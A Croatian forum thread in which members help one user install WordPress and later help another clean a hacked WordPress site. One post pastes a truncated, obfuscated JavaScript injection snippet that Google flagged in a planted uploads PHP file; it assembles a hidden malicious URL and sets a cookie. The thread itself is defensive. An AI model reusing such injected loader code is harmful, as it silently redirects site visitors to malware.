Worpress problem

poruka: 28
|
čitano: 4.005
|
moderatori: Lazarus Long, XXX-Man, vincimus
1
+/- sve poruke
ravni prikaz
starije poruke gore
14 godina
neaktivan
offline
Worpress problem

Pozdrav svima,

 

imam jedan problem pa ako netko zna bilo bi mi od pomoći. Naime, pokušavam instalirati Worpress na serveru kojeg naravno imam. Problem se pojavio gotov odmah na početku kada sam trebao kreirati bazu podatak. Čim se prijavim na stranicu www.primjer.com/phpmyadmin ne dozvoli mi kreirati novu bazu podatak i izbaci mi dolje info "Server running with Suhosin. Please refer to documentation for possible issues." Malo sam surfao po netu i našao tutorial "http://tutorijali.hdonweb.com/web-design/phpmyadmin-ovlasti-pristupa-mysql-bazama" po kojem bi trebao napraviti bazu, ali PHPMYADMIN mi ništa ne dopušta navodno zbog tog famoznog Suhosina. Znači ne mogu dodati niti bazu podataka, niti mjnjati privilegije, niti dodavati usera, apsolutno ništa. Inače, phpmyadmin je verzija 2.11.11.3. Zna li netko kako da maknem taj Suhosin da mi ne pravi probleme ili postoji neki drugačiji način. Da, na serveru je znači stavljen phpmyadmin, ne cpanel!

 

Hvala uanprijed!

 

Pozzz

Mrav radi i tegli i od njega nije poastalo ništa a majmun se zezao po drveću i od njega je postao čovjek!
Moj PC  
0 0 hvala 0
13 godina
neaktivan
offline
Re: Worpress problem

Moj savjet ti je da kontaktiraš te da ih zamoliš da ti oni instaliraju Wordpress, a ti naknadno ga onda podešavaj kako ti volja. Znam da neki nude na serverima joomlu i wordpress instalaciju ako ti treba.

 

Maknut ga možda nećeš moći jer se na serveru takve stvari zaključavaju.

13 godina
protjeran
offline
Worpress problem

Trenutna verija phpmyadmina je 3.4.8, tako da imaš sigurnosnu rupčagu, a ne rupu.

 

Drugo ne preporučam skidanje suhosin patcha, osim ako ne želiš imati još veću sigurnosnu rupčagu.

 

Nadopunit ću se:

 

Što će ti uopće phpmyadmin? To ti ne treba za wordpress.

 

Ulogiraj se preko ssh-a i napravi bazu podataka normalno preko terminala.

 

dakle: mysql -u root(ili koji je već user) -p

 

create database blabla;

 

exit

 

voila!

hacktivist
Poruka je uređivana zadnji put uto 13.12.2011 13:28 (Bypass).
 
0 0 hvala 0
14 godina
neaktivan
offline
Re: Worpress problem
Bypass kaže...

Trenutna verija phpmyadmina je 3.4.8, tako da imaš sigurnosnu rupčagu, a ne rupu.

 

Drugo ne preporučam skidanje suhosin patcha, osim ako ne želiš imati još veću sigurnosnu rupčagu.

 

Nadopunit ću se:

 

Što će ti uopće phpmyadmin? To ti ne treba za wordpress.

 

Ulogiraj se preko ssh-a i napravi bazu podataka normalno preko terminala.

 

dakle: mysql -u root(ili koji je već user) -p

 

create database blabla;

 

exit

 

voila!

Hvala ti na odgovoru! Slažem se sa ovim rupicama, rupama i rupčagama sa tobom ali duga je priča kada bih ti objašnjavao kako sam uspio doći do toga da moram praviti stranicu. Ugl. kada se logiram sa svojim userom koji sam dobio od hosta mogu ja napraviti bazu podataka, ali ne mogu dodati usera i staviti one privilegije koje trebam. Obećano mi je da će staviti zadnju verziju početkom 2012 godine pa ću onda i regularno moći samo dići worpress 3.2.1 sa servera a ne se ovako patiti sa starijom verzijom. Da je barem cPanel na serveru, sve bi bilo jednostavnije (bar mislim).

 

LP

Mrav radi i tegli i od njega nije poastalo ništa a majmun se zezao po drveću i od njega je postao čovjek!
13 godina
protjeran
offline
Re: Worpress problem
dr.House2222 kaže...

Hvala ti na odgovoru! Slažem se sa ovim rupicama, rupama i rupčagama sa tobom ali duga je priča kada bih ti objašnjavao kako sam uspio doći do toga da moram praviti stranicu. Ugl. kada se logiram sa svojim userom koji sam dobio od hosta mogu ja napraviti bazu podataka, ali ne mogu dodati usera i staviti one privilegije koje trebam. Obećano mi je da će staviti zadnju verziju početkom 2012 godine pa ću onda i regularno moći samo dići worpress 3.2.1 sa servera a ne se ovako patiti sa starijom verzijom. Da je barem cPanel na serveru, sve bi bilo jednostavnije (bar mislim).

 

LP

Vrlo jednostavno, koristi taj isti user koji koristiš za logiranje i kreiranje baze za pristup bazi. Ako je password dovoljno dobar, nema problem. Ne trebaš poseban user za bazu za wordpress ;)

 

Nakon toga rješi wp-config i to je to.

 

I uništi phpmyadmin.

hacktivist
14 godina
neaktivan
offline
Re: Worpress problem
Bypass kaže...
dr.House2222 kaže...

Hvala ti na odgovoru! Slažem se sa ovim rupicama, rupama i rupčagama sa tobom ali duga je priča kada bih ti objašnjavao kako sam uspio doći do toga da moram praviti stranicu. Ugl. kada se logiram sa svojim userom koji sam dobio od hosta mogu ja napraviti bazu podataka, ali ne mogu dodati usera i staviti one privilegije koje trebam. Obećano mi je da će staviti zadnju verziju početkom 2012 godine pa ću onda i regularno moći samo dići worpress 3.2.1 sa servera a ne se ovako patiti sa starijom verzijom. Da je barem cPanel na serveru, sve bi bilo jednostavnije (bar mislim).

 

LP

Vrlo jednostavno, koristi taj isti user koji koristiš za logiranje i kreiranje baze za pristup bazi. Ako je password dovoljno dobar, nema problem. Ne trebaš poseban user za bazu za wordpress ;)

 

Nakon toga rješi wp-config i to je to.

 

I uništi phpmyadmin.

Aha, pa da, ja sam imao problem sa wp-configom, nisam znao koji user i pass da stavim, zato sam i pokušavao praviti usera. Hvala ti prijatelju, idem odmah probati! 

Mrav radi i tegli i od njega nije poastalo ništa a majmun se zezao po drveću i od njega je postao čovjek!
14 godina
neaktivan
offline
Worpress problem

Bypass ma svaka ti čast! Uspio sam od prve kako si mi rekao! Instaliran worpress i sve je 5. Imam samo još jedno pitanje....Čim sam se logirao nudi mi da update-am worpress na verziju 3.3., e sad jel smijem to napraviti jer mi je kao na serveru PHP starija verzije i ne podržava niti worpress 3.2.1?????

 

Hvala još jednom!!

 

LP

Mrav radi i tegli i od njega nije poastalo ništa a majmun se zezao po drveću i od njega je postao čovjek!
Moj PC  
0 0 hvala 0
14 godina
neaktivan
offline
Worpress problem

Eh, da, sad imam još jedan problem. Instalirao sam worpress, našao temu, instalirao, aktivirao i kada odem na tu stranicu on meni prikazuje praznu stranicu sa nekom njihovom (host) default temom, neće mi prikazati moju temu što sam započeo u worpressu, predpostavljam da bih sada trebao nešto podešavati sa datotekama koje sam od worpressa digao na server??

Mrav radi i tegli i od njega nije poastalo ništa a majmun se zezao po drveću i od njega je postao čovjek!
Moj PC  
0 0 hvala 0
16 godina
offline
Re: Worpress problem

Jesi je aktivirao?

http://www.Hedonist385.in
14 godina
neaktivan
offline
Worpress problem

Jesam, jesam.....Sve 5!!! :)))

Mrav radi i tegli i od njega nije poastalo ništa a majmun se zezao po drveću i od njega je postao čovjek!
Moj PC  
0 0 hvala 0
14 godina
neaktivan
offline
Worpress problem

imam stranicu koju pokrece wordpress, i od prije par dana imam ogromne "napade" spamova i nakon toga vise ni nemogu pristupiti stranici jer mi mozilla stalno izbacuje Upozorenje, pa me zanima dali netko zna kako to srediti i da mi pomogne u pronalasku rijesenja. hvala unaprijed

 
0 0 hvala 0
16 godina
offline
Re: Worpress problem
Pili kaže...

imam stranicu koju pokrece wordpress, i od prije par dana imam ogromne "napade" spamova i nakon toga vise ni nemogu pristupiti stranici jer mi mozilla stalno izbacuje Upozorenje, pa me zanima dali netko zna kako to srediti i da mi pomogne u pronalasku rijesenja. hvala unaprijed

 

Instaliraj plugin Bad Behavior. Registriraj se na stranici projecthoneypot. Evo kako izgleda statistika kod mene od kad imam njega "Bad Behavior has blocked 520 access attempts in the last 7 days.". U par mjeseci mi se zna provuči spam jer nije registriran, ali rijetko. Od kad imam stranicu provukla mi se mislim dva ili tri spama. Njih ručno obrisao putem administracije komentara. Pogledaj članak na buzz.hr. U komentarima imaš screenshotove plugina.

http://www.Hedonist385.in
Poruka je uređivana zadnji put pon 10.9.2012 14:52 (Robi).
14 godina
neaktivan
offline
Re: Worpress problem
Robi kaže...
Pili kaže...

imam stranicu koju pokrece wordpress, i od prije par dana imam ogromne "napade" spamova i nakon toga vise ni nemogu pristupiti stranici jer mi mozilla stalno izbacuje Upozorenje, pa me zanima dali netko zna kako to srediti i da mi pomogne u pronalasku rijesenja. hvala unaprijed

 

Instaliraj plugin Bad Behavior. Registriraj se na stranici projecthoneypot. Evo kako izgleda statistika kod mene od kad imam njega "Bad Behavior has blocked 520 access attempts in the last 7 days.". U par mjeseci mi se zna provuči spam jer nije registriran, ali rijetko. Od kad imam stranicu provukla mi se mislim dva ili tri spama. Njih ručno obrisao putem administracije komentara. Pogledaj članak na tomislavbuza.com blogu. U komentarima imaš screenshotove plugina.

hvala ti, no zanima me dali ce mi preglednici nakon toga prestati izbacivati poruku upozorenja ili se to rijesava na neki drugi nacin

16 godina
offline
Re: Worpress problem

To bude potrajalo, a trebati će i malo truda i korištenja Google Alati za webmastere. Pretpostavljam da ovako izgleda upozorenje

 

 

Google malware upozorenje Google malware upozorenje
http://www.Hedonist385.in
Poruka je uređivana zadnji put sub 7.1.2012 14:32 (Robi).
16 godina
offline
Worpress problem

Ako je ovo gore u pitanju evo postupak

 

1) Blokirati daljnje unošenje spama (korištenjem pluginova u cms-u, blokiranje IP adresa i dr)

2) Čišćenje stranice (ukloniti sve spam komentare, tekstove, postove, linkove, korisnike i dr.)

3) Zatražiti od Googlea da provjeri stranicu i da nakon provjere ukloni upozorenje. Evo link http://support.google.com/adwords/bin/answer.py?hl=hr&answer=141633

http://www.Hedonist385.in
Moj PC  
0 0 hvala 0
14 godina
neaktivan
offline
Re: Worpress problem

da upravo mi tako izgleda upozorenje. prvi put se susrecem sa ovakvim problemom pa cemo vidjeti kako ce to sve ispasti

16 godina
offline
Re: Worpress problem
Pili kaže...

da upravo mi tako izgleda upozorenje. prvi put se susrecem sa ovakvim problemom pa cemo vidjeti kako ce to sve ispasti

Napravi onda ovo što sam napisao. Daj mi pošalji link na poruke da još nešto provjerim.

http://www.Hedonist385.in
14 godina
neaktivan
offline
Worpress problem

evo ukratko sta kaze google.

Problematični URL-ovi na web-lokaciji

/wp-content/uploads/2011/02/intro.php

 

Sumnja na ubačeni kôd

 

var a=!1; if(-1==document.cookie.indexOf("lonly")){dhf="ht";
dif="\u002F\u0069\u006E\u002E\u0063";var d=new Date;dcf="\u0
067\u0069\u003F\u0032";d.setTime(d.getTime());ddf="bsdm.cn.p
n";ed=new Date(d.getTime()+72E6);dtf="tp://";document.cookie
="lonly="+escape(ed.toGMTString())+";expires="+ed.toGMTStrin
g()+";path=/";df=dhf+dtf+ddf+dif+dcf;var e=-1!=navigator.use
rAgent.toLowerCase().indexOf("firefox"),f="1",j=function(){}
;j.prototype={b:function(){i=43724;this.pa="";u="u";return d
f},a:function(){q="q";dN=49709;this.l=46019;w="";rJ=a;this.V
="";var g=document; cR=kQ=a;this.fa="";var k=window;dO="";va
r h=this;this.H=this.T="";this.u=64509;this.F="rQ";pK="";thi
s.Q=39122;this.na="dY";this.d="fA";this.ka="dE";fQ=cD="";thi
s.I="sE";try{uK=17600;this.z="pC";this.ga="bZR";this.g=41545
;cL=pW="";this.v="nU";wK=a;this.h=eSU="";rO=pOR=this.s=a;thi
s.P=eK=kVQ="";qB=a;mF="mF";this.ia=a;this.ba="";this.ca="bY"
;vW="getsetAttrisdf";this.m="";this.ja="zS";wE=this.i=a;this
.ha="";this.n=a;this.A=55903;this.j=33170;gK=62679;var b=[];
qR=v

Poruka je uređivana zadnji put sub 7.1.2012 14:49 (Pili).
 
0 0 hvala 0
16 godina
offline
Re: Worpress problem

u uploads ne ide php. To ti ubacili. Obriši tu datoteku.

http://www.Hedonist385.in
14 godina
neaktivan
offline
Re: Worpress problem
Robi kaže...

u uploads ne ide php. To ti ubacili. Obriši tu datoteku.

obriso sam i zatrazio sam pregled pa cemo vidjeti kakvi ce biti rezultati

16 godina
offline
Re: Worpress problem
Nemoj zaboraviti obrisati i u temi te obrisati cache. Nalazi ti se u footer na dnu kod zatvaranja html taga.
http://www.Hedonist385.in
14 godina
neaktivan
offline
Re: Worpress problem

ovo sto se tice teme. nisam naso nigdje taj intro.php ali sam instalirao antivirusni program i naso mi je dosta gresaka u kodu. dali bi mi bilo jednostavnije da obrisem temu i ponovo je uploadam

16 godina
offline
Re: Worpress problem
Pili kaže...

ovo sto se tice teme. nisam naso nigdje taj intro.php ali sam instalirao antivirusni program i naso mi je dosta gresaka u kodu. dali bi mi bilo jednostavnije da obrisem temu i ponovo je uploadam

 

Ako nemaš puno promjena na temi, jednostavnije je. Ali prvo deaktiviraj sve dodatke (ne trebaš ih obrisati)

http://www.Hedonist385.in
14 godina
neaktivan
offline
Re: Worpress problem

ipak cu promjeniti temu jer mi je to najjednostavnije

14 godina
neaktivan
offline
Worpress problem

Pozdrav ljudi,

 

evo mene i mog novog problema. Sad je problem taj što kada pišem nekakv post ili bilo što višem nemam Visual tab, samo HTML, i Visual kao da više ne postoji, uopće ne mogu birati u kojem želim pisati članak. Malo sam tražio po netu, nešto pokušao mjenjati u "en", ali nije pomoglo. Jel netko imao sličnih iskustava???

 

Hvala! LP

Mrav radi i tegli i od njega nije poastalo ništa a majmun se zezao po drveću i od njega je postao čovjek!
Moj PC  
0 0 hvala 0
14 godina
neaktivan
offline
Worpress problem

evo mene opet, izgleda da nisam problem rijesio do kraja, ovako, vecina posjetitelja mi se javlja da nemoze pristupiti stranici jer im preglednik javlja da je stranica zarazenja, google webmaster tool neizbacuje nikakav problem i nemam napade spamova, pa me zanima dali mi netko moze pomoci

 
0 0 hvala 0
14 godina
neaktivan
offline
Worpress problem

evo sazno sam nesta vise o virusu. Ovo mi je kaspersky naso.

 

HEUR:Trojan.Script.Iframer

Objects covered by this classification access Internet resources without the user’s knowledge by using hidden <IFRAME> tags.

 

dali mi netko moze sada pomoci

 
0 0 hvala 0
13 godina
neaktivan
offline
Re: Worpress problem

neko ti je hakiro stranicu jer ti nebi sam, tako bio virus na njoj, a obično ih se riješavaš da izbrišeš taj dio koda.

1
Nova poruka
E-mail:
Lozinka:
 
vrh stranice